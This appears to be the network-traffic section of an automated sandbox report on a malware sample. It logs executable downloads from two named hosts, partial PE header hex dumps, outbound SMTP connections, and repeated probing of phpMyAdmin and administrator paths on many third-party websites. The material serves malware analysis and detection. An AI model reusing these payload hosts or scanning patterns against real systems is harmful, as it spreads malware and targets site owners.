                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 21 Dec 2023 04:02:43 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=634389b1.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a5 b7 a8 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 16 02 00 00 e6 43 00 00 00 00 00 da 3c 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 45 00 00 04 00 00 b6 2b 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 5a 02 00 3c 00 00 00 00 80 44 00 18 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 4d 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 15 02 00 00 10 00 00 00 16 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 33 00 00 00 30 02 00 00 34 00 00 00 1a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 03 42 00 00 70 02 00 00 14 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 6a 01 00 00 80 44 00 00 6c 01 00 00 62 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Dec 2023 04:02:52 GMTContent-Type: application/octet-streamContent-Length: 8459133Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=tuc5.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UKiLrNaCnAK1m1EAg33oJr0UUAtEIUyCOIBS01HPhskEKauDz69ys2EWkaaLedfm%2FLvr08cSeU1LVNbDYqZNWH9LZEudwa5kXT%2F6GuFl9CkuejFgzyFU90urviJARARBI0RiFhfk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 838d3b628c1f8dc0-MIAalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ec b8 83 65 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00 Data Ascii: MZP@!L!This program must be run under Win32$7PELeF@@@@P,CODEd
                                Source: Joe Sandbox ViewIP Address: 95.216.227.177 95.216.227.177
                                Source: Joe Sandbox ViewIP Address: 211.168.53.110 211.168.53.110
                                Source: Joe Sandbox ViewASN Name: HOSTCOLORUS HOSTCOLORUS
                                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: Joe Sandbox ViewJA3 fingerprint: 523e76adb7aac8f6a8b2bf1f35d85d1f
                                Source: unknownFTP traffic detected: 62.109.151.15:21 -> 192.168.2.4:50445 220 62.109.151.15 FTP server ready
                                Source: global trafficTCP traffic: 192.168.2.4:54756 -> 178.238.43.196:25
                                Source: global trafficTCP traffic: 192.168.2.4:55036 -> 85.248.129.36:587
                                Source: global trafficTCP traffic: 192.168.2.4:58750 -> 212.227.15.41:587
                                Source: global trafficTCP traffic: 192.168.2.4:59407 -> 164.46.93.189:587
                                Source: global trafficTCP traffic: 192.168.2.4:59415 -> 216.230.254.4:587
                                Source: global trafficTCP traffic: 192.168.2.4:59417 -> 162.43.104.145:587
                                Source: global trafficTCP traffic: 192.168.2.4:59425 -> 62.149.128.72:587
                                Source: global trafficTCP traffic: 192.168.2.4:59449 -> 66.97.32.25:25
                                Source: global trafficTCP traffic: 192.168.2.4:59450 -> 77.93.220.102:587
                                Source: global trafficHTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shpilliwilli.com
                                Source: global trafficHTTP traffic detected: GET /fe59b57390b3eb9c78ef311810f298a4/288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: linkofstrumble.com
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: e-bicycles.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: e-bicycles.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kingsway-hk.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: inhodinky.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: detmar.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elrocket.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: emmetisportfun.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elteconline.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: erikamoveis.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: emmetisportfun.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: roland-sk.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elteconline.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: roland-sk.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakupusa.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakupusa.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: magokorokan.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: inhodinky.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: st-comet.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: magokorokan.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: preda.plAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sluchatka.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: s-kotobuki-s.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sluchatka.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: s-kotobuki-s.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: reproma.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: instalanova.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predajpaliet.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: emr.com.arAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elektrospol.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
